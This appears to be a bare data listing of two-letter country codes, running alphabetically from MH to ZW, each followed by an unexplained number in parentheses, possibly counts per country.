MH (952)
MK (480)
ML (79)
MM (367)
MN (679)
MO (194)
MP (103)
MQ (670)
MR (750)
MS (516)
MT (375)
MU (435)
MV (195)
MW (77)
MX (392)
MY (405)
MZ (53)
NA (958)
NC (928)
NE (974)
NF (591)
NG (805)
NI (105)
NL (54)
NO (831)
NP (846)
NR (90)
NU (625)
NZ (865)
OM (25)
PA (463)
PE (523)
PF (225)
PG (500)
PH (4)
PK (295)
PL (953)
PM (427)
PN (262)
PR (310)
PS (352)
PT (181)
PW (663)
PY (550)
QA (622)
RE (659)
RO (510)
RS (318)
RU (155)
RW (764)
SA (267)
SB (114)
SC (256)
SD (477)
SE (86)
SG (1)
SH (385)
SI (375)
SJ (568)
SK (785)
SL (191)
SM (779)
SN (56)
SO (600)
SR (618)
SS (219)
ST (782)
SV (328)
SX (789)
SY (152)
SZ (104)
TC (258)
TD (747)
TF (611)
TG (440)
TH (592)
TJ (987)
TK (30)
TL (851)
TM (507)
TN (601)
TO (559)
TR (915)
TT (548)
TV (446)
TW (584)
TZ (124)
UA (524)
UG (151)
UM (14)
US (697)
UY (26)
UZ (520)
VA (651)
VC (705)
VE (221)
VG (54)
VI (434)
VN (5)
VU (943)
WF (231)
WS (443)
XK (723)
YE (871)
YT (58)
ZA (870)
ZM (963)
ZW (251)